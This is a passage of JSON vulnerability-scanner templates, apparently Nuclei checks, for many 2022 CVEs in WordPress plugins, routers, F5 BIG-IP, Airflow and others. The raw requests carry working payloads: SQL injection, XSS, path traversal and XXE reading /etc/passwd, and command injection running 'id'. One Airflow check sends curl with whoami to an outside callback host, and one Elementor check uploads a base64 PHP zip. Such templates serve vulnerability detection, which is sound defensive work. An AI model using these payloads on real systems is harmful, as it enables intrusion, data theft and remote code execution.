<3.30.30 - Authorization Bypass","severity":"high"},"requests":[{"raw":["GET /cgi/get_param.cgi?xml&sys.passwd&sys.su.name HTTP/1.1\nHost: {{Hostname}}\nCookie: tmpToken=;\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["<sys.passwd>","<sys.su.name>"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","group":1,"regex":["<sys\\.passwd>([A-Z0-9a-z]+)<\\/sys\\.passwd>","<sys\\.su\\.name>([a-z]+)<\\/sys\\.su\\.name>"],"part":"body"}]}]},{"id":"CVE-2022-0747","info":{"name":"Infographic Maker iList < 4.3.8 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 20s\nPOST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=qcld_upvote_action&post_id=1+AND+(SELECT+1626+FROM+(SELECT(SLEEP(6)))niPH)\n","GET /wp-content/plugins/infographic-and-list-builder-ilist/assets/js/ilist_custom_admin.js HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration_1>=6","status_code_2 == 200","contains(content_type_2, \"text/javascript\")","contains(body_2, \"show_ilist_templates\")"],"condition":"and"}]}]},{"id":"CVE-2022-22733","info":{"name":"Apache ShardingSphere ElasticJob-UI privilege escalation","severity":"medium"},"requests":[{"raw":["POST /api/login HTTP/1.1\nHost: {{Hostname}}\nAccept: application/json, text/plain, */*\nAccess-Token:\nContent-Type: application/json;charset=UTF-8\nOrigin: {{RootURL}}\nReferer: {{RootURL}}\n\n{\"username\":\"guest\",\"password\":\"guest\"}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"success\":true","\"isGuest\":true","\"accessToken\":"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-32015","info":{"name":"Complete Online Job Search System 1.0 - SQL Injection","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?q=category&search=Banking%27%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,md5({{num}}),15,16,17,18,19--+"],"matchers":[{"type":"word","part":"body","words":["{{md5({{num}})}}"]}]}]},{"id":"CVE-2022-35405","info":{"name":"Zoho ManageEngine - Remote Code Execution","severity":"critical"},"requests":[{"method":"POST","path":["{{RootURL}}/xmlrpc"],"body":"<?xml version=\"1.0\"?><methodCall><methodName>{{randstr}}</methodName><params><param><value>big0us</value></param></params></methodCall>\n","matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<name>faultString</name>"]},{"type":"word","part":"body","words":["No such service [{{randstr}}]","No such handler: {{randstr}}"],"condition":"or"},{"type":"word","part":"body","words":["<methodResponse>","</methodResponse>"],"condition":"or"}]}]},{"id":"CVE-2022-24384","info":{"name":"SmarterTools SmarterTrack - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /Main/Default.aspx?viewSurveyError=Unknown+survey\"><img%20src=x%20onerror=alert(document.domain)> HTTP/1.1\nHost: {{Hostname}}\n\n"],"matchers":[{"type":"word","words":["\"type\":\"error\",\"text\":\"Unknown survey\\\"><img src=x onerror=alert(document.domain)>\"","smartertrack"],"condition":"and"}]}]},{"id":"CVE-2022-47945","info":{"name":"Thinkphp Lang - Local File Inclusion","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/?lang=../../thinkphp/base","{{BaseURL}}/?lang=../../../../../vendor/topthink/think-trace/src/TraceDebug"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Call Stack","class=\"trace"],"condition":"and"},{"type":"status","status":[500]}]}]},{"id":"CVE-2022-1388","info":{"name":"F5 BIG-IP iControl - REST Auth Bypass RCE","severity":"critical"},"requests":[{"raw":["POST /mgmt/tm/util/bash HTTP/1.1\nHost: {{Hostname}}\nConnection: keep-alive, X-F5-Auth-Token\nX-F5-Auth-Token: a\nAuthorization: Basic {{base64(auth)}}\nContent-Type: application/json\n\n{\n     \"command\": \"run\",\n     \"utilCmdArgs\": \"-c '{{cmd}}'\"\n}\n","POST /mgmt/tm/util/bash HTTP/1.1\nHost: localhost\nConnection: keep-alive, X-F5-Auth-Token\nX-F5-Auth-Token: a\nAuthorization: Basic {{base64(auth)}}\nContent-Type: application/json\n\n{\n     \"command\": \"run\",\n     \"utilCmdArgs\": \"-c '{{cmd}}'\"\n}\n"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["commandResult","8831-2202-EVC"],"condition":"and"}]}]},{"id":"CVE-2022-34047","info":{"name":"WAVLINK WN530HG4 - Improper Access Control","severity":"high"},"requests":[{"raw":["GET /set_safety.shtml?r=52300 HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["var syspasswd=\"","<title>APP</title>"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","regex":["syspasswd=\"(.+?)\""]}]}]},{"id":"CVE-2022-26564","info":{"name":"HotelDruid Hotel Management Software 3.0.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/creaprezzi.php?prezzoperiodo4=%22><script>javascript:alert(%27XSS%27)</script>","{{BaseURL}}/modifica_cliente.php?tipo_tabella=%22><script>javascript:alert(%27XSS%27)</script>&idclienti=1","{{BaseURL}}/dati/availability_tpl.php?num_app_tipo_richiesti1=%22><script>javascript:alert(%27XSS%27)</script>"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>javascript:alert('XSS')</script>","HotelDruid"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-29014","info":{"name":"Razer Sila Gaming Router 2.0.441_api-2.0.418 - Local File Inclusion","severity":"high"},"requests":[{"raw":["POST /ubus/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n{\"jsonrpc\":\"2.0\",\"id\":3,\"method\":\"call\",\"params\":[\"4183f72884a98d7952d953dd9439a1d1\",\"file\",\"read\",{\"path\":\"/etc/passwd\"}]}\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-22242","info":{"name":"Juniper Web Device Manager - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/error.php?SERVER_NAME=<script>alert(document.domain)</script>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>","The requested resource is not authorized to view"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0281","info":{"name":"Microweber Information Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/users/search_authors"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"username\":","\"email\":","\"display_name\":"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-21500","info":{"name":"Oracle E-Business Suite <=12.2 - Authentication Bypass","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/OA_HTML/ibeCAcpSSOReg.jsp"],"matchers-condition":"and","matchers":[{"type":"word","words":["Registration","Register as individual","<!-- ibeCZzpRuntimeIncl.jsp end -->"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-31798","info":{"name":"Nortek Linear eMerge E3-Series - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/card_scan.php?No=0000&ReaderNo=0000&CardFormatNo=%3Cimg%20src%3Dx%20onerror%3Dalert%28document.domain%29%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":[",\"CardFormatNo\":\"<img src=x onerror=alert(document.domain)>\"}"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-31978","info":{"name":"Online Fire Reporting System v1.0 - SQL injection","severity":"critical"},"requests":[{"raw":["@timeout: 10s\nPOST /classes/Master.php?f=delete_inquiry HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nid='+AND+(SELECT+7774+FROM+(SELECT(SLEEP(6)))dPPt)+AND+'rogN'='rogN\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(content_type, \"text/html\")","contains(body, \"status\\\":\\\"success\")"],"condition":"and"}]}]},{"id":"CVE-2022-1916","info":{"name":"WordPress Active Products Tables for WooCommerce <1.0.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=woot_get_smth&what={%22call_action%22:%22x%22,%22more_data%22:%22\\u003cscript%3Ealert(document.domain)\\u003c/script%3E%22}"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>"]},{"type":"word","part":"body","words":["woot-content-in-popup","woot-system","woot-table"],"condition":"or"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-31269","info":{"name":"Linear eMerge E3-Series - Information Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/test.txt"],"matchers-condition":"and","matchers":[{"type":"word","words":["ID=","Password="],"condition":"and"},{"type":"word","part":"header","words":["text/plain"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","regex":["Password='(.+?)'"]}]}]},{"id":"CVE-2022-0827","info":{"name":"WordPress Best Books <=2.6.3 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout 10s\nPOST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=bestbooks_add_transaction&type=x&account=x&date=x&description=1&debit=(CASE WHEN (9277=9277) THEN SLEEP(6) ELSE 9277 END)&credit=1\n"],"matchers":[{"type":"dsl","dsl":["duration_1>=6","status_code == 200","contains(body, \"Account added successfully\")"],"condition":"and"}]}]},{"id":"CVE-2022-4260","info":{"name":"WordPress WP-Ban <1.69.1 - Stored Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET / HTTP/1.1\nHost: {{Hostname}}\n","POST /wp-admin/admin.php?page=wp-ban/ban-options.php HTTP/1.1\nHost: {{Hostname}}\n\n_wpnonce={{nonce}}&_wp_http_referer=%2Fwp-admin%2Foptions-general.php%3Fpage%3Dwp-ban%252Fban-options.php&banned_ips=&banned_ips_range=&banned_hosts=&banned_referers=XSS&banned_user_agents=&banned_exclude_ips=&banned_template_message=%3Cscript%3Ealert%28document.domain%29%3B%3C%2Fscript%3E&Submit=Save+Changes\n","GET / HTTP/1.1\nHost: {{Hostname}}\nReferer: XSS\n"],"cookie-reuse":true,"req-condition":true,"host-redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["contains(body_4, \"<script>alert(document.domain);</script>\")","contains(content_type_4, \"text/html\")","status_code_4 == 200"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["_wpnonce=([0-9a-z]+)"],"internal":true,"part":"body"}]}]},{"id":"CVE-2022-1329","info":{"name":"Elementor Website Builder - Remote Code Execution","severity":"high"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/ HTTP/1.1\nHost: {{Hostname}}\n","POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=336b29d7aee0463d8b651303eab505ea\n\n--336b29d7aee0463d8b651303eab505ea\nContent-Disposition: form-data; name=\"action\"\n\nelementor_upload_and_install_pro\n--336b29d7aee0463d8b651303eab505ea\nContent-Disposition: form-data; name=\"_nonce\"\n\n{{nonce}}\n--336b29d7aee0463d8b651303eab505ea\nContent-Disposition: form-data; name=\"fileToUpload\"; filename=\"{{randstr}}.zip\"\n\n{{base64_decode(\"UEsDBBQAAAAAAPEiZ1YAAAAAAAAAAAAAAAAOACAAZWxlbWVudG9yLXByby9VVA0AB8csB2TILAdkxywHZHV4CwABBOgDAAAE6AMAAFBLAwQUAAgACAB8KGdWAAAAAAAAAAA6BAAAHwAgAGVsZW1lbnRvci1wcm8vZWxlbWVudG9yLXByby5waHBVVA0ABzw2B2Q9NgdkPDYHZHV4CwABBOgDAAAE6AMAAKVSXU/bQBB8rn/FgqryoXyUoFZqKAUTnBCJhshxQKiq0Nlex6ee705354T8++45AfLQ9qVv9u3s7OzMfr3QpQ66x8cBHMNU1AsuYcIq7EMksELplIGpUb56jTYzXDuuZB+SEncQD5ha7hCuai5yNFAyC9wBE6IPuWELYDKnD6VBswVCuoG1QPNnFKDRFJg5yNHyhWxBpVIuEAxaraTlSwTMueNy0Wp4KmWwAyN0YB0zDnOQarW3o38ej/tQOqdtv9vFF5GdTFXdi9pVT1bVJsPzlW7rpsF+8K8ZqzSj+eebx3ZtePNe0fC68uic2dKPCWtXKrPjkKf2hXs0tnHntPO5c/IG/V9FrGH5uyI/KcFnB9eqYpzmv47YFi81y35556OdAlxmzOFCmTUMyNIt9C1UbqEwiGBV4VbM0EmsVQ0Zk5RMzq0zPK0pc5+zzLvUUKmcF2tPQm+19Ifg6EwcmsqCKpqf0WRO0Uk0TMC0TgXP4JZnKC0C3Yz2L7akSNOGx3cMvYbZVgMMFREzf4MtQE51A8uN63D6MmNL2ILNmkyuQdCmr8jOn1Z92ygHuiHPUypN6kvm/D4rLgSkCLXFohYt309geBgnN3fzBMLJIzyEcRxOksczAlNgVMUlbqh4pQUnZtrBMOnWJNUzfI/iwQ21hFfj23HySIJhOE4m0WwGw7sYQpiGcTIezG/DGKbzeHo3izowQ6/K5/UvN4smEHIsR8e4sH7pbhAEvIDDPW4tusP3T6Mo+XHAMseX5M/Bz6Oj4J1BVxt5FgSYlQqq/NPh/uA+avc+9nrtk9Pel/0jqgUX34LfUEsHCH5L6n9mAgAAOgQAAFBLAQIUAxQAAAAAAPEiZ1YAAAAAAAAAAAAAAAAOACAAAAAAAAAAAAD9QQAAAABlbGVtZW50b3ItcHJvL1VUDQAHxywHZMgsB2THLAdkdXgLAAEE6AMAAAToAwAAUEsBAhQDFAAIAAgAfChnVn5L6n9mAgAAOgQAAB8AIAAAAAAAAAAAALSBTAAAAGVsZW1lbnRvci1wcm8vZWxlbWVudG9yLXByby5waHBVVA0ABzw2B2Q9NgdkPDYHZHV4CwABBOgDAAAE6AMAAFBLBQYAAAAAAgACAMkAAAAfAwAAAAA=\")}}\n--336b29d7aee0463d8b651303eab505ea--\n","GET /index.php?activate=1 HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body_4","words":["5f9bc5edd71c78284dabe630df8cd71d"]}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["admin-ajax.php\",\"nonce\":\"([0-9a-zA-Z]+)\"}"],"internal":true}]}]},{"id":"CVE-2022-41840","info":{"name":"Welcart eCommerce <=2.7.7 - Local File Inclusion","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/usc-e-shop/functions/progress-check.php?progressfile=../../../../../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/json"]},{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-2627","info":{"name":"WordPress Newspaper < 12 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php?td_theme_name=Newspaper&v=11.2 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=td_ajax_loop&loopState[moduleId]={{xss_payload}}&loopState[server_reply_html_data]=\n"],"payloads":{"xss_payload":["<form><math><img+onerror=alert(document.domain)+src=1><mtext></form>"]},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<form><math><img onerror=alert(document.domain) src=1><mtext>","td-block-"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-46073","info":{"name":"Helmet Store Showroom - Cross Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/hss/?q=%27%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(body, \"Helmet Store Showroom\")","contains(body, \"><script>alert(document.domain)</script>\")"],"condition":"and"}]}]},{"id":"CVE-2022-45038","info":{"name":"WBCE CMS v1.5.4 -  Cross Site Scripting (Stored)","severity":"medium"},"requests":[{"raw":["GET /admin/login/index.php HTTP/1.1\nHost: {{Hostname}}\n","POST /admin/login/index.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nurl=&username_fieldname={{username_fieldname}}&password_fieldname={{password_fieldname}}&{{username_fieldname}}={{username}}&{{password_fieldname}}={{password}}&submit=Login\n","GET /admin/settings/ HTTP/1.1\nHost: {{Hostname}}\n","POST /admin/settings/save.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nadvanced=no&formtoken={{formtoken}}&website_footer=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&page_trash=inline&home_folders=true&intro_page=false&frontend_login=false&frontend_signup=false&submit=&default_language=EN&default_timezone=0&default_date_format=d.m.Y&default_time_format=H%3Ai&default_template=wbcezon&default_theme=wbce_flat_theme&search=public&search_template=&page_spacer=-&app_name={{app_name}}&sec_anchor=wbce_&wbmailer_default_sendername=WBCE+CMS+Mailer&wbmailer_routine=phpmail&wbmailer_smtp_host=&wbmailer_smtp_port=&wbmailer_smtp_secure=&wbmailer_smtp_username=&wbmailer_smtp_password=\n","GET /search/index.php HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>","Results For"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"username_fieldname","group":1,"regex":["name=\"username_fieldname\" value=\"(.*)\""],"internal":true,"part":"body"},{"type":"regex","name":"password_fieldname","group":1,"regex":["name=\"password_fieldname\" value=\"(.*)\""],"internal":true,"part":"body"},{"type":"regex","name":"formtoken","group":1,"regex":["name=\"formtoken\" value=\"(.*)\""],"internal":true,"part":"body"},{"type":"regex","name":"app_name","group":1,"regex":["name=\"app_name\" value=\"(.*?)\""],"internal":true,"part":"body"}]}]},{"id":"CVE-2022-25489","info":{"name":"Atom CMS v2.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/widgets/debug.php?a=<script>alert(document.domain)</script>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>","Path Array","console-debug"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-34048","info":{"name":"Wavlink WN-533A8 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /cgi-bin/login.cgi HTTP/1.1\nHost: {{Hostname}}\n\nnewUI=1&page=login&username=admin&langChange=0&ipaddr=196.219.234.10&login_page=x\");alert(9);x=(\"&homepage=main.html&sysinitpage=sysinit.shtml&wizardpage=wiz.shtml&hostname=0.0.0.1&key=M94947765&password=ab4e98e4640b6c1ee88574ec0f13f908&lang_select=en\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["x\");alert(9);x=(\"?login=0\");</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-24260","info":{"name":"VoipMonitor - Pre-Auth SQL Injection","severity":"critical"},"requests":[{"raw":["POST /api.php HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\n\nmodule=relogin&action=login&pass=nope&user=a' UNION SELECT 'admin','admin',null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,1,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null; #\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["\"success\":true","_vm_version","_debug"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"kval","kval":["PHPSESSID"]}]}]},{"id":"CVE-2022-40734","info":{"name":"Laravel Filemanager v2.5.1 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/download?working_dir=%2F../../../../../../../../../../../../../../../../../../../etc&type=Files&file=passwd","{{BaseURL}}/laravel-filemanager/download?working_dir=%2F../../../../../../../../../../../../../../../../../../../etc&type=Files&file=passwd"],"stop-at-first-match":true,"matchers":[{"type":"regex","regex":["root:[x*]:0:0"]}]}]},{"id":"CVE-2022-25356","info":{"name":"Alt-n/MDaemon Security Gateway <=8.5.0 - XML Injection","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/SecurityGateway.dll?view=login&redirect=true&9OW4L7RSDY=1"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Exception: Error while [Loading XML","&lt;RegKey&gt;","&lt;IsAdmin&gt;"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0660","info":{"name":"Microweber <1.2.11 - Information Disclosure","severity":"high"},"requests":[{"raw":["POST /api/user_login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}&password={{password}}\n","POST /module/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nReferer: {{BaseURL}}admin/view:comments\n\nclass=+module+module-comments-manage+&id=mw_admin_posts_with_comments&data-type=comments%2Fmanage&parent-module-id=mw-main-module-backend&parent-module=comments&data-search-keyword={{randstr}}\n"],"cookie-reuse":true,"req-condition":true,"matchers":[{"type":"dsl","dsl":["contains(body_2,'QueryException')","contains(body_2,'SQLSTATE')","contains(body_2,'runQueryCallback')","contains(header_2,\"text/html\")","status_code_2==500"],"condition":"and"}]}]},{"id":"CVE-2022-0954","info":{"name":"Microweber <1.2.11 - Stored Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /api/user_login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}&password={{password}}\n","POST /api/save_option HTTP/2\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nReferer: {{BaseURL}}/admin/view:shop/action:options\n\noption_key=checkout_url&option_group=shop&option_value=%22%3E%3CiMg+SrC%3D%22x%22+oNeRRor%3D%22alert(document.domain)%3B%22%3E&module=shop%2Forders%2Fsettings%2Fother\n","POST /module/ HTTP/2\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nReferer: {{BaseURL}}/admin/view:shop/action:options\n\nmodule=settings%2Fsystem_settings&id=settings_admin_mw-main-module-backend-settings-admin&class=card-body+pt-3&option_group=shop%2Forders%2Fsettings%2Fother&is_system=1&style=position%3A+relative%3B\n"],"cookie-reuse":true,"req-condition":true,"matchers":[{"type":"dsl","dsl":["contains(body_2,\"true\")","contains(body_3,'\\\"><img src=\\\"x\\\" onerror=\\\"alert(document.domain);\\\">\\\" placeholder=\\\"Use default')","contains(header_3,\"text/html\")","status_code_3==200"],"condition":"and"}]}]},{"id":"CVE-2022-24265","info":{"name":"Cuppa CMS v1.0 - SQL injection","severity":"high"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nuser={{username}}&password={{password}}&language=en&task=login\n","@timeout: 20s\nPOST /components/menu/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\npath=component%2Fmenu%2F%26menu_filter%3D3'+and+sleep(6)--+-&data_get=eyJtZW51X2ZpbHRlciI6IjMifQ%3D%3D&uniqueClass=wrapper_content_906185\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["duration>=6","status_code_2 == 200","contains(content_type_2, \"text/html\")","contains(body_2, \"menu/html/edit.php\")"],"condition":"and"}]}]},{"id":"CVE-2022-34753","info":{"name":"SpaceLogic C-Bus Home Controller <=1.31.460 - Remote Command Execution","severity":"high"},"requests":[{"raw":["GET /delsnap.pl?name=|id HTTP/1.1\nHost: {{Hostname}}\nAuthorization: Basic {{base64('{{username}}:' + '{{password}}')}}\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["uid=\\d+\\(([^)]+)\\) gid=\\d+\\(([^)]+)\\)"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-30777","info":{"name":"Parallels H-Sphere 3.6.1713 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index_en.php?from=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E","{{BaseURL}}/index.php?from=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","words":["<TITLE>\"><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-29006","info":{"name":"Directory Management System 1.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /admin/index.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nusername=admin' or '1'='1&password=1&login=login\n","GET /admin/dashboard.php HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["DMS || Dashboard","DMS Admin","Admin Profile"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0786","info":{"name":"WordPress KiviCare <2.3.9 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 10s\nGET /wp-admin/admin-ajax.php?action=ajax_get&route_name=get_doctor_details&clinic_id=%7B\"id\":\"1\"%7D&props_doctor_id=1,2)+AND+(SELECT+42+FROM+(SELECT(SLEEP(6)))b HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(content_type, \"text/html\")","contains(body, \"Doctor details\")"],"condition":"and"}]}]},{"id":"CVE-2022-43016","info":{"name":"OpenCATS 0.9.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /index.php?m=login&a=attemptLogin HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}&password={{password}}\n","GET /index.php?m=toolbar&callback=<script>alert(document.domain)</script>&a=authenticate HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["EVAL=<script>alert(document.domain)</script>","cats_connected"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-39986","info":{"name":"RaspAP 2.8.7 - Unauthenticated Command Injection","severity":"critical"},"requests":[{"raw":["POST /ajax/openvpn/del_ovpncfg.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ncfg_id=;id;#\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["uid=([0-9(a-z-)]+) gid=([0-9(a-z-)]+) groups=([0-9(a-z-)]+)"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-40127","info":{"name":"AirFlow < 2.4.0 - Remote Code Execution","severity":"high"},"requests":[{"raw":["GET /login/ HTTP/1.1\nHost: {{Hostname}}\n","POST /login/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}&password={{password}}&_csrf_token={{csrf_token}}\n","@timeout: 15s\nPOST /api/v1/dags/example_bash_operator/dagRuns HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\n    \"conf\": {\n\"dag_run\": \"{{randstr}}\"\n},\n  \"dag_run_id\": \"id \\\"&& curl `whoami`.{{interactsh-url}}\",\n  \"logical_date\": \"{{date_time(\"%Y-%M-%D\")}}T{{date_time(\"%H:%m:%s\")}}.920Z\"\n\n}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["state\": \"queued\""]},{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"csrf_token","group":1,"regex":["type=\"hidden\" value=\"(.*?)\">"],"internal":true}]}]},{"id":"CVE-2022-2414","info":{"name":"FreeIPA - XML Entity Injection","severity":"high"},"requests":[{"raw":["POST /ca/rest/certrequests HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/xml\n\n<!--?xml version=\"1.0\" ?-->\n<!DOCTYPE replace [<!ENTITY ent SYSTEM \"file:///etc/passwd\"> ]>\n<CertEnrollmentRequest>\n  <Attributes/>\n  